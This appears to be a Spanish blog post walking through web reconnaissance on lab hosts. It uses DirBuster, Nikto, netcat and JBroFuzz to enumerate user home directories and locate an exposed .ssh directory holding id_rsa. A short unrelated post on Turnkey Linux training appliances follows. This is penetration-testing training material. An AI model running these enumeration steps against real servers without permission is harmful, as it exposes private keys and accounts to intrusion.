Hagamos uso de varios identificadores de vulnerabilidades, configuraciones por defecto o archivos y directorios sensibles. Para ello primero usemos OWASP Dirbuster para identificar directorios y archivos.

Host 192.168.2.100

root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.100/ -r
DirBuster: option requires an argument — r
Starting OWASP DirBuster 0.12 in headless mode
Starting dir/file list based brute forcing
Dir found: / – 200
Dir found: /cgi-bin/ – 403
Dir found: /icons/ – 200
File found: /level.html – 200
File found: /copyright.txt – 200
File found: /index2.html – 200

Host 192.168.2.101

root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.101/ -r
DirBuster: option requires an argument — r
Starting OWASP DirBuster 0.12 in headless mode
Starting dir/file list based brute forcing
Dir found: / – 200
Dir found: /cgi-bin/ – 403
Dir found: /home/ – 403
Dir found: /icons/ – 200
File found: /200711_002.pdf – 200
File found: /200611_001.pdf – 200
File found: /200711_004.pdf – 200
File found: /Acceptable_Use_Policy.pdf – 200
File found: /Audit_Policy.pdf – 200
File found: /Email_Policy.pdf – 200

Ahora con Nikto en modo default

Host 192.168.2.100

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.100
- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.2.100
+ Target Hostname:    slax.example.net
+ Target Port:        80
+ Start Time:         2010-03-13 17:14:41
—————————————————————————
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-0: DEBUG HTTP verb may show server debugging information
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3588 items checked: 8 item(s) reported on remote host
+ End Time:           2010-03-13 17:15:08 (27 seconds)
—————————————————————————
+ 1 host(s) tested

Host 192.168.2.101

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.101
- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.2.101
+ Target Hostname:    192.168.2.101
+ Target Port:        80
+ Start Time:         2010-03-13 17:16:25
—————————————————————————
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3588 items checked: 7 item(s) reported on remote host
+ End Time:           2010-03-13 17:16:54 (29 seconds)
—————————————————————————
+ 1 host(s) tested

Además de las alertas sobre las versiones desactualizadas de software, podemos destacar la identificación del directorio de usuario root. (~root). Esto nos permite deducir que posiblemente existan diferentes directorios para los usuarios identificados. Veamos:

Con netcat

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~root/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:36:11 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 557
Connection: close
Content-Type: text/html

…

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~pirrip/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:38:13 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 561
Connection: close
Content-Type: text/html

…

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~magwitch/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:40:13 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 565
Connection: close
Content-Type: text/html

…

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~havisham/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:42:27 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 565
Connection: close
Content-Type: text/html

Otra herramienta que nos permite identificar posibles usuarios, archivos, directorios en un host, es la herramienta de Fuzzing JBroFuzz

Veamos:

Tenemos los posibles usuarios válidos del sistema:

pickwick
winkle
snodgrass
tupman
weller
tweller
havisham
magwitch
pirrip
nickleby
rnickleby
noggs
squeers
pinch
tapley
gamp
marley
scrooge
cratchit
sikes
dawkins
claypole
root

Los cuales a su vez pueden tener un directorio como el identificado para root

Basta entonces con agregarle el símbolo virgulilla (~) al comienzo de cada uno y anexarlo a las listas de fuzzing de  JBroFuzz.

0,http://192.168.2.101/~pickwick,404,Not Found,No,No
1,http://192.168.2.101/~winkle,404,Not Found,No,No
2,http://192.168.2.101/~snodgrass,404,Not Found,No,No
3,http://192.168.2.101/~tupman,404,Not Found,No,No
4,http://192.168.2.101/~weller,404,Not Found,No,No
5,http://192.168.2.101/~tweller,404,Not Found,No,No
6,http://192.168.2.101/~havisham,200,OK,No,No
7,http://192.168.2.101/~magwitch,200,OK,No,No
8,http://192.168.2.101/~pirrip,200,OK,No,No
9,http://192.168.2.101/~nickleby,404,Not Found,No,No
10,http://192.168.2.101/~rnickleby,404,Not Found,No,No
11,http://192.168.2.101/~noggs,404,Not Found,No,No
12,http://192.168.2.101/~squeers,404,Not Found,No,No
13,http://192.168.2.101/~pinch,404,Not Found,No,No
14,http://192.168.2.101/~tapley,404,Not Found,No,No
15,http://192.168.2.101/~gamp,404,Not Found,No,No
16,http://192.168.2.101/~marley,404,Not Found,No,No
17,http://192.168.2.101/~scrooge,404,Not Found,No,No
18,http://192.168.2.101/~cratchit,404,Not Found,No,No
19,http://192.168.2.101/~sikes,404,Not Found,No,No
20,http://192.168.2.101/~dawkins,404,Not Found,No,No
21,http://192.168.2.101/~claypole,404,Not Found,No,No
22,http://192.168.2.101/~root,200,OK,No,No

Las líneas que están en negrita corresponden a ubicaciones reales y activas en el servidor objetivo

~havisham
~magwitch
~pirrip
~root

Hagamos ahora una exploración de directorios y archivos mediante JBroFuzz a los directorios raíz del server y de los usuarios identificados.

Al host 192.168.2.100

4,http://192.168.2.100//icons/,200,OK,No,No
784,http://192.168.2.100//index.php/123,200,OK,No,No
802,http://192.168.2.100//info.php,200,OK,No,No (Y)

Al host 192.1682.101

4,http://192.168.2.101//icons/,200,OK,No,No

Ahora a los directorios identificados para los usuarios:

Usuario havisham:

Ningún resultado de interés

Usuario magwitch:

Ningún resultado de interés

Usuario pirrip:

385,http://192.168.2.101/~pirrip//.ssh,200,OK,No,No

Usuario root:

Ningún resultado de interés

Vemos entonces como pudimos identificar la existencia del directorio .ssh para el usuario pirrip

http://192.168.2.101/~pirrip//.ssh/

Index of /~pirrip//.ssh

 Name                    Last modified      Size  Description
 Parent Directory                             -
 id_rsa                  05-Jan-2008 20:29  1.6K
 id_rsa.pub              05-Jan-2008 20:29  393

En el próximo post veremos como podemos utilizar la información obtenida para penetrar el sistema.

Turnkey Linux pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas y plataformas tecnológicas de uso común en empresas, instituciones académicas y gobierno electrónico.

Estas imágenes (.iso y/o VMware) automáticamente una vez iniciadas pondrán en marcha el sistema que nosotros hayamos elegido. Habilitando además un perfecto sistema de administración como lo es Webmin (aunque podemos administrarlo normalmente de manera local).

Veamos un video demostrativo del proceso de ejecución de los entornos/appliances:

Dichos sistemas están basados en la distribución Ubuntu, por lo que el proceso de actualización y administración se facilitará en gran medida.

El uso de dicho proyecto como ambientes virtualizados de entrenamiento en seguridad es muy amplio. Pues con unos simple pasos (Descargar, bootear desde un equipo físico o máquina virtual) tendremos todo un entorno que asemejará uno real, para realizar las prácticas propuestas como entrenamiento (Hardening, Penetration Test, Análisis  de Código en busca de vulnerabilidades, Análisis de Sistemas Criptográficos, Análisis Forense, CTF y Wargames).

Algunos de los entornos disponibles son:

• LAMP
• Drupal
• File Server
• OpenBravo
• Zimbra
• Redmine
• Ruby on Rails
• Torrent Server
• Domain Controller
• Moodle
• MediaWiki
• WordPress
• Joomla
• PostGreSQL
• Tomcat on Apache
• phpBB
• LAPP
• DokuWiki
• ProjectPier
• Symfony
• BugZilla
• Mantis
• SDK for Amazon EC2

ScreenShots del proyecto >>

Tutorial de Instalaciónen VirtualBox >>

Más información y descargas del Proyecto Turnkey Linux >>